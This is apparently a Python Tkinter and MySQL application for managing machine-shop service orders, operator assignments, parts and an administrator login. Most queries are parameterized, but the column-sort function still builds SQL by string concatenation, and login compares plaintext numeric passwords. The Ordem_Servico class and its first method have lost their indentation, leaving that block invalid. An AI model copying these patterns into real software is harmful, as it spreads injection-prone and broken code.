            self.img4.place_forget()
            self.dadosTempoExtra.place_forget()
    except Exception:
        pass
def classificar_coluna(self, por, sinal):
    """Re-query the completed-OS list ordered by column *por*.

    sinal toggles the direction: 0 -> DESC (and stores 1 for the next
    click), 1 -> ASC (and stores 0).
    """
    atributo = por
    try:
        # Flip the stored direction so the next click sorts the other way
        if sinal == 0:
            self.sinal = 1
            ordem = 'DESC'
        elif sinal == 1:
            self.sinal = 0
            ordem = 'ASC'
        consulta = ("select ID, Operador, CodigoPeca, CodigoOperacao, Quant, Tipo, Maquina from concluidas where OS = "
                    + self.pegarOS + " order by " + str(atributo) + " " + ordem + " ")
        self.cursor.execute(consulta)
        valido = self.cursor.fetchall()
    except Exception as erro:
        print(f'{erro}, {(erro.__class__)}')
        self.viewOrdemServico.delete(*self.viewOrdemServico.get_children())
        messagebox.showerror(parent=self.janelaInicial, title='Alerta', message='Erro ao comunicar-se com Banco de Dados')
        return ''
    # Rebuild the Treeview with the newly ordered rows
    self.viewOrdemServico.delete(*self.viewOrdemServico.get_children())
    for registro in valido:
        self.viewOrdemServico.insert("", "end", values=registro)
def remover_focus(self, event, objeto):
    """Clear the selection of *objeto* and swap the detail panel for the
    "no information" placeholder."""
    objeto.selection_set()
    try:
        self.lblSemInformacao.place(relx=0.5, rely=0.5, anchor="center")
        # Hide value labels, headers and check icons (same order as before)
        for widget in (self.dadosTempoProgramado, self.dadosTempoOperando,
                       self.dadosTempoGasto, self.dadosTempoExtra,
                       self.lb1, self.lb2, self.lb3, self.img4,
                       self.img1, self.img2, self.img3, self.lb4):
            widget.place_forget()
    except Exception:
        pass
def transformar_tempo_decimal(self, thora, tminu, tsegu):
    """Format hour/minute/second components as a zero-padded 'HH:MM:SS' string.

    Each component may be an int or a numeric string. Values below 10 are
    left-padded with '0' (the old code achieved this via a fragile
    divide-by-100-and-slice-the-string trick); values of 10 or more are
    rendered as-is.
    """
    def _pad(valor):
        # Two-digit zero padding; >= 10 passes through unchanged
        numero = int(valor)
        return str(valor) if numero >= 10 else '{:02d}'.format(numero)
    return ':'.join(_pad(v) for v in (thora, tminu, tsegu))
def somar_total_horas_gastas_os(self, parametro, args):
    """Sum time columns returned by the query *parametro* into a display string.

    args == 1: sum the first column of every row (MySQL may prefix it with
               'N day(s),', which is accumulated separately as whole days).
    args == 2: sum the first two columns of every row (time spent + extra).

    Returns 'H:MM:SS', prefixed with 'N dia(s) e ' when days were reported.

    Fixes two defects of the previous version: the carry logic could leave
    seconds/minutes >= 60 when two values were added per row (it subtracted
    60 at most once), and one day was reported as 'dias' (plural).
    """
    contDia = 0       # whole days reported by MySQL
    total_seg = 0     # running h/m/s total, in seconds (days kept apart)
    totalHoraGastaOS = []
    try:
        self.cursor.execute(parametro)
        totalHoraGastaOS = self.cursor.fetchall()
    except Exception:
        print("Não conseguimos Obter o Tempo Total desta O.S :'(")

    def _dias_segundos(texto):
        # Parse 'H:MM:SS' or 'N day(s), H:MM:SS' -> (days, seconds)
        partes = texto.replace(':', ' ').split()
        if 'day' in texto:
            return int(partes[0]), int(partes[2]) * 3600 + int(partes[3]) * 60 + int(partes[4])
        return 0, int(partes[0]) * 3600 + int(partes[1]) * 60 + int(partes[2])

    for valor in totalHoraGastaOS:
        dias, seg = _dias_segundos(str(valor[0]))
        contDia += dias
        total_seg += seg
        if args == 2:
            dias2, seg2 = _dias_segundos(str(valor[1]))
            contDia += dias2
            total_seg += seg2
    # Exact carry via divmod instead of single-step -= 60 adjustments
    horas, resto = divmod(total_seg, 3600)
    minutos, segundos = divmod(resto, 60)
    resultadoTempo = self.transformar_tempo_decimal(horas, minutos, segundos)
    if contDia != 0:
        a1 = 'dia' if contDia == 1 else 'dias'
        resultadoTempo = f"{contDia} {a1} e {resultadoTempo}"
    return resultadoTempo
def centraliza_tela(self, larg, alt, jane):
    """Center the window *jane* on the screen.

    larg/alt are the desired window width and height; the geometry string
    places the top-left corner so the window is screen-centered.
    """
    tela_larg = jane.winfo_screenwidth()
    tela_alt = jane.winfo_screenheight()
    # Offset of the top-left corner that centers a larg x alt window
    pos_x = tela_larg / 2 - larg / 2
    pos_y = tela_alt / 2 - alt / 2
    return jane.geometry('%dx%d+%d+%d' % (larg, alt, pos_x, pos_y))
def sumir_widgets(self):
    """Hide every report panel so a single view can be shown afterwards.

    Each panel group sits in its own try block: a missing widget in one
    group must not prevent the remaining groups from being hidden.
    """
    try:
        # Completed-OS view
        self.frameExibirTotalOperacao.place_forget()
        self.frameDadosTempo.place_forget()
        self.frameDadosTreeview.place_forget()
        self.remover_focus('', self.viewOrdemServico)
        for widget in (self.labelTipo, self.boxTipo, self.labelPesquisar,
                       self.boxPesquisar, self.campoBusca, self.botBuscar,
                       self.botAtribuirOper):
            widget.place_forget()
    except Exception:
        pass
    try:
        # Paused-OS view
        self.frameDadosTreeviewPause.place_forget()
        self.remover_focus('', self.viewPausas)
        for widget in (self.labelTipo2, self.boxTipo2, self.labelPesquisar2,
                       self.boxPesquisar2, self.campoBusca2, self.botBuscar2):
            widget.place_forget()
    except Exception:
        pass
    try:
        # Parts view
        self.botAddPeca.place_forget()
        self.frameDadosTreeviewPecas.place_forget()
    except Exception:
        pass
    try:
        # About/report-info view
        self.frameInfoRelatorio.place_forget()
    except Exception:
        pass
def botao_exibir_inicio(self):
    """Show the completed-OS view (hides every other report panel first)."""
    self.sumir_widgets()
    # Disabled panels kept for reference: frameExibirTotalOperacao,
    # frameDadosTempo and the search widgets (labelTipo, boxTipo,
    # labelPesquisar, boxPesquisar, campoBusca, botBuscar).
    self.frameDadosTreeview.place(relx=0.400, rely=0.680, relwidth=0.750, relheight=0.600, anchor='center')
def botao_exibir_pausas(self):
    """Show the paused-OS view (hides every other report panel first)."""
    self.sumir_widgets()
    # Disabled search widgets kept for reference: labelTipo2, boxTipo2,
    # labelPesquisar2, boxPesquisar2, campoBusca2, botBuscar2.
    self.frameDadosTreeviewPause.place(relx=0.400, rely=0.680, relwidth=0.750, relheight=0.600, anchor='center')
def botao_exibir_pecas(self):
    """Switch to the parts tab: hide every tab widget, place the add-part button and the parts treeview."""
    self.sumir_widgets()
    self.botAddPeca.place(relx=0.885, rely=0.025)
    self.frameDadosTreeviewPecas.place(
        relx=0.400, rely=0.680, relwidth=0.750, relheight=0.600, anchor='center'
    )
def botao_exibir_sobre(self):
    """Switch to the about/report tab: hide every tab widget, place the report frame."""
    self.sumir_widgets()
    self.frameInfoRelatorio.place(relx=0.500, rely=0.600, anchor="center", relheight=0.600)
def chamar_proxima_folha(self):
    """Advance the assignment wizard one page (self.prox in 0..3).

    Page 1 shows machine selection, page 2 operator selection, page 3 the
    final summary.  On page 3 the per-operation time and the total
    programmed time are computed and the chosen machines/operators are
    fetched from the database for display.
    """
    if self.prox < 3:
        self.prox += 1
    if self.prox == 1:
        # Machine-selection page.
        self.frameAt1.place_forget()
        self.frameAt2.place_forget()
        self.acessoSimultaneoOperacao.place_forget()
        self.botAnterior.place(relx=0.580, rely=0.900)
        self.frameAt3.place(relx=0.100, rely=0.200, relwidth=0.800, relheight=0.580)
        self.acessoSimultaneoMaquina.place(relx=0.540, rely=0.780)
        self.botProximo['state'] = DISABLED
        self.botProximo.place(relx=0.770, rely=0.900)
        self.verificar_frame1('')
        # The "simultaneous machine" switch follows the operation-level
        # simultaneous-access flag.
        if self.acessOperacao.get() != 1:
            self.acessoSimultaneoMaquina['state'] = DISABLED
        else:
            self.acessoSimultaneoMaquina['state'] = NORMAL
    elif self.prox == 2:
        # Operator-selection page.
        self.frameAt3.place_forget()
        self.acessoSimultaneoMaquina.place_forget()
        self.frameAt4.place(relx=0.100, rely=0.200, relwidth=0.800, relheight=0.580)
        self.acessoSimultaneoOperador.place(relx=0.540, rely=0.780)
        self.botProximo['state'] = DISABLED
        self.botProximo.place(relx=0.770, rely=0.900)
        self.verificar_frame1('')
        # NOTE(review): this gate also reads acessOperacao (not a dedicated
        # operator flag) — mirrors the original behaviour; confirm intended.
        if self.acessOperacao.get() != 1:
            self.acessoSimultaneoOperador['state'] = DISABLED
        else:
            self.acessoSimultaneoOperador['state'] = NORMAL
    elif self.prox == 3:
        # Summary page.
        self.frameAt4.place_forget()
        self.acessoSimultaneoOperador.place_forget()
        self.botProximo.place_forget()
        self.frameAt5.place(relx=0.100, rely=0.200, relwidth=0.800, relheight=0.580)
        self.botConcluir.place(relx=0.770, rely=0.900)
        # Time per single operation (h, m, s from the form).
        tempA = int(self.campoHora.get())
        tempB = int(self.campoMinuto.get())
        tempC = int(self.campoSegundo.get())
        self.tempPorOper = self.transformar_tempo_decimal(tempA, tempB, tempC)
        # Gross programmed time = per-operation time * quantity.
        quant = int(self.campoQuant.get())
        tempH = tempA * quant
        tempM = tempB * quant
        tempS = tempC * quant
        # Fix: normalize the whole overflow with divmod.  The original code
        # carried at most a single 60-second/60-minute overflow, which
        # under-reported the total whenever quantity >= 2.
        carry, tempS = divmod(tempS, 60)
        tempM += carry
        carry, tempM = divmod(tempM, 60)
        tempH += carry
        self.tempProgramado = self.transformar_tempo_decimal(tempH, tempM, tempS)
        # Show the summary values.
        self.dados1['text'] = self.pegarOS
        self.dados2['text'] = self.campoPeca.get()
        self.dados3['text'] = self.operacaoSelect.get()
        self.dados4['text'] = self.campoQuant.get()
        self.dados5['text'] = self.tempProgramado
        # List the machines selected for the chosen operation.
        textFormat = ''
        for i in self.listaMaquina:
            if i[1].get() == '1':
                try:
                    # Parameterized query (the original concatenated the value
                    # into the SQL string).
                    self.cursor.execute("select Maquina from maquinas where Codigo = %s", (str(i[0]),))
                    maquinaSelect = self.cursor.fetchall()
                except Exception as erro:
                    print(f'{erro}, {(erro.__class__)}')
                    # Fix: skip this entry instead of appending a stale or
                    # undefined result after a failed lookup.
                    continue
                textFormat += ', ' + maquinaSelect[0][0]
        self.text1['state'] = NORMAL
        self.text1.delete("1.0", "end")
        self.text1.insert(END, textFormat[2:])
        self.text1['state'] = DISABLED
        # List the operators selected for the chosen operation.
        textFormat2 = ''
        for i in self.listaFuncionario:
            if i[0].get() == '1':
                try:
                    self.cursor.execute("select Nome from Funcionarios where CPF = %s", (str(i[1]),))
                    funcionarioSelect = self.cursor.fetchall()
                except Exception as erro:
                    print(f'{erro}, {(erro.__class__)}')
                    continue
                textFormat2 += ', ' + funcionarioSelect[0][0]
        self.text2['state'] = NORMAL
        self.text2.delete("1.0", "end")
        self.text2.insert(END, textFormat2[2:])
        self.text2['state'] = DISABLED
def voltar_folha_anterior(self):
    """Step the assignment wizard back one page, restoring that page's widgets."""
    if self.prox > 0:
        self.prox -= 1
    if self.prox == 0:
        # First page: operation data.
        self.frameAt1.place(relx=0.100, rely=0.200, relwidth=0.800, relheight=0.280)
        self.frameAt2.place(relx=0.100, rely=0.530, relwidth=0.800, relheight=0.250)
        self.acessoSimultaneoOperacao.place(relx=0.540, rely=0.780)
        self.botAnterior.place_forget()
        self.frameAt3.place_forget()
        self.acessoSimultaneoMaquina.place_forget()
        self.verificar_frame1('')
    elif self.prox == 1:
        # Machine-selection page.
        self.frameAt3.place(relx=0.100, rely=0.200, relwidth=0.800, relheight=0.580)
        self.acessoSimultaneoMaquina.place(relx=0.540, rely=0.780)
        self.frameAt4.place_forget()
        self.acessoSimultaneoOperador.place_forget()
        self.verificar_frame1('')
    elif self.prox == 2:
        # Operator-selection page: re-show "next", hide the summary widgets.
        self.frameAt4.place(relx=0.100, rely=0.200, relwidth=0.800, relheight=0.580)
        self.acessoSimultaneoOperador.place(relx=0.540, rely=0.780)
        self.botProximo.place(relx=0.770, rely=0.900)
        self.frameAt5.place_forget()
        self.botConcluir.place_forget()
        self.verificar_frame1('')
def inserir_atribuicao(self):
    """Persist the wizard's assignment: one ordem_processo row per selected
    machine x operator pair, then mirror the newest row in the treeview.

    All queries are parameterized — the original built SQL by concatenating
    user-entered form values, which is an injection risk.
    """
    num_os = self.pegarOS  # renamed from `os`, which shadowed the os module
    peca = self.campoPeca.get()
    operacao = self.operacaoSelect.get()[:5]
    quant = self.campoQuant.get()
    tempPorOper = self.tempPorOper
    tempProgramado = self.tempProgramado
    global dataAberta
    dataAberta = str(datetime.now())
    try:
        self.cursor.execute('select id from operacao where Codigo_Operacao = %s', (operacao,))
        idOperacao = self.cursor.fetchall()[0][0]
    except Exception:
        if messagebox.showerror(parent=self.janelaAtribuir, title='Alerta', message='Erro ao tentar localizar Operação no Banco de Dados'):
            return ''
    codigo = ''
    try:
        # Draw random 7-digit codes until an unused one is found (bounded attempts).
        for _ in range(1000000, 10000000):
            codigo = str(randint(1000000, 9999999))
            self.cursor.execute("select id from ordem_processo where Codigo = %s", (codigo,))
            if len(self.cursor.fetchall()) == 0:
                break
    except Exception:
        if messagebox.showerror(parent=self.janelaAtribuir, title='Alerta', message='Falha ao executar ação com Banco de Dados'):
            return ''
    listIdMaquina = []
    try:
        # Resolve each ticked machine checkbox to its database id.
        for i in self.listaMaquina:
            if i[1].get() == '1':
                self.cursor.execute("select id from maquinas where Codigo = %s", (str(i[0]),))
                listIdMaquina.append(self.cursor.fetchall()[0][0])
    except Exception:
        if messagebox.showerror(parent=self.janelaAtribuir, title='Alerta', message='Não foi possível buscar por Id da Máquina'):
            return ''
    listIdFuncionario = []
    try:
        # Resolve each ticked operator checkbox to its database id.
        for i in self.listaFuncionario:
            if i[0].get() == '1':
                self.cursor.execute("select id from Funcionarios where CPF = %s", (str(i[1]),))
                listIdFuncionario.append(self.cursor.fetchall()[0][0])
    except Exception:
        if messagebox.showerror(parent=self.janelaAtribuir, title='Alerta', message='Não foi possível buscar por Id do Operador'):
            return ''
    # One row per machine/operator combination.
    for idMaquina in listIdMaquina:
        for idOperador in listIdFuncionario:
            try:
                self.cursor.execute(
                    "insert into ordem_processo (Codigo, OS, Peca, Quant, idOperacao, idMaquina,"
                    " idOperador, TempoPorOperacao, TempoProgramado, DataAberta, DataIniciada,"
                    " DataFinalizada, Estado)"
                    " VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, NULL, NULL, DEFAULT)",
                    (codigo, num_os, peca, quant, str(idOperacao), str(idMaquina),
                     str(idOperador), tempPorOper, tempProgramado, dataAberta))
            except Exception as erro:
                print(f'{erro}, {(erro.__class__)}')
                if messagebox.showerror(parent=self.janelaAtribuir, title='Alerta', message='Falha ao enviar dados para atribuição'):
                    return ''
    self.cursor.execute(
        "select a.id, b.Nome, a.Peca, c.Processo_Usinagem, a.Quant, d.Maquina, a.Estado"
        " from ordem_processo as a join funcionarios as b on b.id = a.idOperador"
        " join operacao as c on c.id = a.idOperacao"
        " join maquinas as d on d.id = a.idMaquina"
        " where OS = %s order by id desc limit 1", (self.pegarOS,))
    valido = self.cursor.fetchall()
    self.janelaAtribuir.destroy()
    if messagebox.showinfo(parent=self.janelaDetalhesOS, title='Alerta', message='Atribuição realizada com sucesso!'):
        # Unpack the newly created row and append it to the treeview.
        ID, Operador, CodigoPeca, CodigoOperacao, Quant, Maquina, Estado = valido[0]
        self.viewOrdemServico.insert("", "end", values=(ID, Operador, CodigoPeca, CodigoOperacao, Quant, Maquina, Estado))
def verificar_frame1(self, args):
    """Enable/disable the wizard's "next" button for the current page.

    Page 0 requires part, quantity, operation and a non-zero h/m duration;
    pages 1 and 2 require at least one ticked machine / operator checkbox,
    and untick extras when simultaneous access is off.  `args` is unused
    (the method is bound as a widget event callback).

    NOTE(review): controleCheck/controleCheck2 are instance counters that
    accumulate across calls and are only reset when nothing is ticked —
    confirm this matches the intended single-selection behaviour.
    """
    try:
        if len(self.campoPeca.get()) >=1 and self.campoQuant.get() != '0' and self.operacaoSelect.get() != 'Parado' and len(self.campoHora.get()) >= 1 and len(self.campoMinuto.get()) >= 1 and self.prox == 0:
            try:
                # A duration of exactly 0h 0m keeps "next" disabled.
                if int(self.campoHora.get()) == 0 and int(self.campoMinuto.get()) == 0:
                    self.botProximo['state'] = DISABLED
                else:
                    self.botProximo['state'] = NORMAL
            except:
                pass
        elif self.prox == 1:
            v = 0  # becomes 1 when one or more checkbuttons are selected
            # count the ticked entries in the machine list
            for i in range(len(self.listaMaquina)):
                # a value of '1' means this checkbutton is ticked
                if self.listaMaquina[i][1].get() == '1':
                    v = 1  # at least one checkbutton is selected
                    self.controleCheck += 1
                    # remember the first ticked checkbutton
                    if self.controleCheck == 1:
                        self.controleOne = self.listaMaquina[i]  # first ticked checkbutton
            # if v is set, enable "next": a checkbutton was selected
            if v != 0:
                self.botProximo['state'] = NORMAL
            # otherwise keep it disabled and reset the counter (nothing ticked)
            else:
                self.botProximo['state'] = DISABLED
                self.controleCheck = 0
            # without simultaneous access only one machine may stay selected
            if self.acessMaquina.get() != 1:
                # if more than one machine was ticked
                if self.controleCheck > 1:
                    for i in range(len(self.listaMaquina)):
                        # untick everything except the first one
                        if self.listaMaquina[i] != self.controleOne:
                            self.listaMaquina[i][1].set(0)
        elif self.prox == 2:
            v = 0
            for i in range(len(self.listaFuncionario)):
                if self.listaFuncionario[i][0].get() == '1':
                    v = 1
                    self.controleCheck2 += 1
                    # remember the first ticked employee
                    if self.controleCheck2 == 1:
                        self.controleOne2 = self.listaFuncionario[i]  # first ticked employee
            if v != 0:
                self.botProximo['state'] = NORMAL
            else:
                self.botProximo['state'] = DISABLED
                self.controleCheck2 = 0
            # without simultaneous access only one operator may stay selected
            if self.acessOperador.get() != 1:
                # if more than one operator was ticked
                if self.controleCheck2 > 1:
                    for i in range(len(self.listaFuncionario)):
                        # untick everything except the first one
                        if self.listaFuncionario[i] != self.controleOne2:
                            self.listaFuncionario[i][0].set(0)
        else:
            self.botProximo['state'] = DISABLED
    except Exception as erro: print(f'{erro}, {(erro.__class__)}')
def confirmar_login(self, event):
    """Validate the login form and open the main window on success.

    The CPF must be 11 numeric characters and the password 8 numeric
    characters.  Credentials are checked against the Administrador table
    with a parameterized query — the original concatenated both fields
    straight into the SQL string (injection risk).  `event` is unused
    (Return-key binding).
    """
    self.labelError = Label(self.frameLogin, text='', fg='#bf0606', bg='white', width=40, font=('arial', 10))
    self.labelError.place(relx=0.180, rely=0.620)
    # Empty password field (the original comment wrongly said "login").
    if self.campSenha.get() == '':
        self.labelError['text'] = 'Preencha o campo!'
        return ''
    # The login (CPF) must be numeric and exactly 11 characters long.
    if str(self.campLogin.get()).isnumeric() and len(self.campLogin.get()) == 11:
        self.user = self.campLogin.get()
        # The password must be numeric and exactly 8 characters long.
        if str(self.campSenha.get()).isnumeric() and len(self.campSenha.get()) == 8:
            self.password = self.campSenha.get()
            try:
                # Parameterized credential lookup.
                self.cursor.execute(
                    "select Nome from Administrador where CPF = %s and Senha = %s",
                    (self.user, self.password))
                valido = self.cursor.fetchall()
            except Exception as erro:
                print(f'{erro}, {(erro.__class__)}')
                return messagebox.showerror(parent=self.janelaFuncio, title='03-Error-Servidor', message='03-Error: Não acesso ao servidor.')
            # Exactly one match: clear the form and open the main window.
            if len(valido) == 1:
                self.campLogin.delete(0, END)
                self.campSenha.delete(0, END)
                self.janelaFuncio.withdraw()
                self.janela_raiz()
            else:
                # No matching user found.
                return messagebox.showinfo(parent=self.janelaFuncio, title='Alerta', message='Login não Existe!')
        else:
            self.labelError['text'] = 'Usuário ou Senha Incorreta!'
    else:
        self.labelError['text'] = 'Usuário ou Senha Incorreta!'
def sair(self):
    """Ask for confirmation, close the main window and bring the login window back."""
    if not messagebox.askokcancel(parent=self.janelaInicial, title='Alerta', message='Deseja Realmente Sair?'):
        return
    self.janelaInicial.destroy()
    self.campLogin.focus_force()
    self.janelaFuncio.deiconify()
class Ordem_Servico():
#funções de verificar campos e enviar informações ao banco de dados
def confirmarCamposOrdemServico(self):
if self.campoCliente.get() == '' or self.campoNumOS.get() == '' or self.campoProduto.get() == '' or self.campoQTDE.get() == '' or self.campoDataPrevista.get() == '' or self.campoOrdemAbertura.get() == '' or self.tipoOS.get() == 'Select':
messagebox.showinfo(parent=self.janelaCriarOS, title='Alerta', message='Verifique os Campos')
self.exibir_primeira_aba()
return False
elif len(self.listaPecas.get_children()) == 0:
messagebox.showinfo(parent=self.janelaCriarOS, title='Itens não adcionado', message='É necessário adcionar no mínimo 1 item a lista.')
return False
else:
return True
def inseririndo_dados_os(self):
    """Insert the new service order plus one ordem_pecas row per listed part.

    The expected date is converted from dd/mm/yyyy to ISO yyyy-mm-dd.
    All statements are parameterized — the original concatenated form
    values straight into the SQL strings (injection risk).
    """
    dataPrevista = self.campoDataPrevista.get()
    # dd/mm/yyyy -> yyyy-mm-dd
    dataPrevista = dataPrevista[6:] + '-' + dataPrevista[3:5] + '-' + dataPrevista[0:2]
    dataAbertura = str(datetime.now())
    self.cursor.execute(
        "INSERT INTO ordem_servico VALUES (NULL, %s, %s, %s, %s, %s, %s, %s, %s,"
        " NULL, NULL, 'Aberto', %s, %s)",
        (self.campoNumOS.get(),
         self.campoCliente.get().capitalize(),
         self.campoProduto.get().capitalize(),
         self.campoQTDE.get(),
         self.tipoOS.get(),
         dataPrevista,
         self.idOrdemAbertura,
         dataAbertura,
         self.campoComplemento.get('1.0', 'end'),
         self.campoObservação.get('1.0', 'end')))
    self.cursor.execute('SELECT id FROM ordem_servico WHERE OS = %s', (self.campoNumOS.get(),))
    idOS = str(self.cursor.fetchall()[0][0])
    # One ordem_pecas row per part currently listed in the treeview.
    for item in self.listaPecas.get_children():
        peca = self.listaPecas.item(item, 'values')
        self.cursor.execute(
            "INSERT INTO ordem_pecas VALUES (NULL, %s, %s, %s, 'Novo Item', NULL, DEFAULT)",
            (idOS, peca[0], peca[3]))
def confirmar_tela_os(self):
    """Validate the O.S. form, persist it and refresh the treeview; close the window on success."""
    if not self.confirmarCamposOrdemServico():
        return ''
    try:
        self.inseririndo_dados_os()
    except mysql.connector.errors.IntegrityError:
        # Duplicate O.S. number.
        messagebox.showwarning(parent=self.janelaCriarOS, title='Alerta', message='Nº de O.S já existente')
        return ''
    except Exception as erro:
        print(f'{erro}, {(erro.__class__)}')
        messagebox.showerror(parent=self.janelaCriarOS, title='Alerta', message='Erro ao tentar inserir dados')
        return ''
    else:
        self.exibir_os_treeview()
        if messagebox.showinfo(parent=self.janelaCriarOS, title='Alerta', message='Ordem de Serviço aberta com sucesso'):
            self.janelaCriarOS.destroy()
def exibir_os_treeview(self):
    """Append the most recently created O.S. to the treeview, unless it is already the last row shown."""
    try:
        ultimo = self.OrdemServico.get_children()[-1]
        ultimoID = self.OrdemServico.item(ultimo)["values"][0]
    except:
        # Empty treeview: nothing to compare against.
        ultimoID = 0
    self.cursor.execute("select a.id, a.OS, a.Cliente, a.Produto, a.QTDE, a.TipoOS, a.DataPrevista, a.Estado from ordem_servico as a order by id desc limit 1")
    osBuscada = self.cursor.fetchall()
    # Only insert when the newest database row is not already displayed.
    if int(ultimoID) != int(osBuscada[0][0]):
        linha = osBuscada[0]
        self.OrdemServico.insert(
            "", "end",
            values=(linha[0], linha[1], linha[2], linha[3], linha[4], linha[5], linha[6], linha[7]))
#função dos botões de adcionar e remover itens da lista
def buscar_peca(self, event):
    """Look up a part by (partial) code and fill the read-only detail fields.

    Uses a parameterized LIKE query — the original concatenated the search
    text straight into the SQL (injection risk).  `event` is unused
    (Return-key binding; the "Ok" button passes '').
    """
    try:
        self.cursor.execute(
            "select * from pecas where CodPeca like %s",
            ('%' + self.campoCP.get() + '%',))
        self.pecas = self.cursor.fetchall()
    except Exception:
        return ''
    campos = (self.campoN, self.campoM, self.campoT)
    # The detail fields are kept disabled for the user; enable them briefly
    # so they can be rewritten.
    for campo in campos:
        campo['state'] = NORMAL
        campo.delete(0, END)
    if self.pecas:
        # First match: name, material, treatment.
        self.campoN.insert('end', self.pecas[0][1])
        self.campoM.insert('end', self.pecas[0][3])
        self.campoT.insert('end', self.pecas[0][4])
    for campo in campos:
        campo['state'] = DISABLED
def adcionar_peca_lista(self):
    """Add the currently looked-up part to the O.S. part list (once, with a valid quantity)."""
    # Quantity must parse as an int >= 1.
    try:
        quantidade_ok = int(self.campoQ.get()) >= 1
    except:
        quantidade_ok = False
    if not quantidade_ok:
        return messagebox.showinfo(parent=self.janelaCriarOS, title='Quantidade não válida', message='Informe a quantidade de peça.')
    # Reject duplicates (same part id already in the list).
    if self.pecas[0][0] in self.count_lista:
        messagebox.showwarning(parent=self.janelaCriarOS, title='Alerta', message='Este item já foi adcionado.')
        return
    self.count_lista.append(self.pecas[0][0])
    self.listaPecas.insert("", "end", values=(self.pecas[0][0], self.pecas[0][1], self.pecas[0][2], self.campoQ.get(), self.pecas[0][3], self.pecas[0][4], self.pecas[0][5]))
    # Clear the search and detail fields for the next entry.
    for campo in (self.campoN, self.campoM, self.campoT):
        campo['state'] = NORMAL
    self.campoCP.delete(0, END)
    for campo in (self.campoN, self.campoM, self.campoT):
        campo.delete(0, END)
        campo['state'] = DISABLED
def remover_peca_lista(self):
    """Remove the selected row from the part list (treeview and duplicate-guard list)."""
    try:
        selecionado = self.listaPecas.selection()[0]
        codigo = self.listaPecas.item(selecionado, 'values')[0]
        # Keep the duplicate-guard list in sync with the treeview.
        self.count_lista.remove(int(codigo))
        self.listaPecas.delete(selecionado)
    except Exception as erro:
        # Reached when no row is selected (IndexError) — reported as such.
        print(f'{erro}, {(erro.__class__)}')
        messagebox.showinfo(parent=self.janelaCriarOS, title='Linha não selecionada', message='Elemento não selecionado')
#funções que farão a troca entre a primeira parte e a segunda da janela
def exibir_primeira_aba(self):
    """Swap the O.S. window to page one (order data), hiding page-two widgets if they exist yet."""
    try:
        # Page two may not have been built/placed yet.
        self.botFinalizarOS.place_forget()
        self.frameOS4.place_forget()
        self.frameOS5.place_forget()
    except:
        pass
    self.frameOS2.place(relx=0.020, rely=0.030, relwidth=0.960, relheight=0.400)
    self.frameOS3.place(relx=0.020, rely=0.450, relwidth=0.960, relheight=0.450)
    self.botProximoOS.place(relx=0.850, rely=0.920)
def exibir_segunda_aba(self):
    """Swap the O.S. window to page two (part list)."""
    # Hide page one.
    self.frameOS2.place_forget()
    self.frameOS3.place_forget()
    self.botProximoOS.place_forget()
    # Show page two and its finish button.
    self.botFinalizarOS.place(relx=0.850, rely=0.920)
    self.frameOS4.place(relx=0.020, rely=0.030, relwidth=0.960, relheight=0.300)
    self.frameOS5.place(relx=0.020, rely=0.350, relwidth=0.960, relheight=0.550)
#labels e outros widgets que compoem a janela
def primeira_aba(self):
    """Build page one of the "create O.S." window (order data form).

    Looks up the logged-in user to prefill the read-only "Ord. de
    Abertura" field — now with a parameterized query (the original
    concatenated self.user into the SQL) — then creates the entry widgets
    with input masks enforced through StringVar traces.
    """
    try:
        self.cursor.execute('select id, Nome from funcionarios where CPF = %s', (self.user,))
        busca = self.cursor.fetchall()
    except Exception as erro:
        print(f'{erro}, {(erro.__class__)}')
        if messagebox.showerror(parent=self.janelaInicial, title='Verifique a conexão', message='Sem conexão com Banco de Dados'):
            return 0
    else:
        self.idOrdemAbertura = str(busca[0][0])
        nome = busca[0][1]
    self.frameOS1 = Frame(self.janelaCriarOS, highlightbackground='#e6e6e6', highlightcolor='#e6e6e6', highlightthickness=2, bg='white')
    self.frameOS1.place(relx=0.020, rely=0.030, relwidth=0.960, relheight=0.940)
    self.frameOS2 = Frame(self.frameOS1, highlightbackground='#e6e6e6', highlightcolor='#e6e6e6', highlightthickness=2, bg='white')
    self.frameOS3 = Frame(self.frameOS1, highlightbackground='#e6e6e6', highlightcolor='#e6e6e6', highlightthickness=2, bg='white')
    lbl = Label(self.frameOS2, font=('arial', 10), text='Cliente', bg='white')
    lbl.place(relx=0.040, rely=0.030)

    # --- input masks (StringVar trace callbacks) ---
    def format_campo_cliente(*args):
        # Client name: max 40 characters.
        mask = varCampoCliente.get()
        varCampoCliente.set(mask[:40])

    def format_campo_dataP(*args):
        # Date mask dd/mm/yyyy: digits only, slashes inserted automatically.
        mask = dataPrevi.get()
        dataPrevi.set(mask[:10])
        if len(mask) >= 1 and mask[-1] != '/' and not mask[-1].isnumeric():
            dataPrevi.set(mask[0:len(mask) - 1])
        # After the two day digits append a slash...
        if len(mask) == 2 and mask.isnumeric():
            self.campoDataPrevista.delete(0, END)
            self.campoDataPrevista.insert(END, mask+'/')
        # ...and again after the two month digits.
        elif len(mask) == 5 and mask[3:].isnumeric():
            self.campoDataPrevista.delete(0, END)
            self.campoDataPrevista.insert(END, mask+'/')

    def format_campo_os(*args):
        # O.S. number: digits only, max 11.
        mask = varCampoOS.get()
        varCampoOS.set(mask[:11])
        if len(mask) >= 1 and not mask[-1].isnumeric():
            varCampoOS.set(mask[0:len(mask) - 1])

    def format_campo_produto(*args):
        # Product: max 30 characters.
        mask = varProduto.get()
        varProduto.set(mask[:30])

    def format_campo_qtde(*args):
        # Quantity: digits only, max 4.
        mask = varQTDE.get()
        varQTDE.set(mask[:4])
        if len(mask) >= 1 and not mask[-1].isnumeric():
            varQTDE.set(mask[0:len(mask) - 1])

    varCampoCliente = StringVar()
    varCampoCliente.trace('w', format_campo_cliente)
    dataPrevi = StringVar()
    dataPrevi.trace('w', format_campo_dataP)
    varCampoOS = StringVar()
    varCampoOS.trace('w', format_campo_os)
    varProduto = StringVar()
    varProduto.trace('w', format_campo_produto)
    varQTDE = StringVar()
    varQTDE.trace('w', format_campo_qtde)
    self.campoCliente = Entry(self.frameOS2, font=('arial', 12), relief=GROOVE, border=2, textvariable=varCampoCliente)
    self.campoCliente.place(relx=0.040, rely=0.160, relwidth=0.600)
    self.campoCliente.focus_force()
    lbl = Label(self.frameOS2, font=('arial', 10), text='O.S', bg='white')
    lbl.place(relx=0.780, rely=0.030)
    self.campoNumOS = Entry(self.frameOS2, font=('arial', 12), relief=GROOVE, border=2, textvariable=varCampoOS)
    self.campoNumOS.place(relx=0.780, rely=0.160, relwidth=0.180)
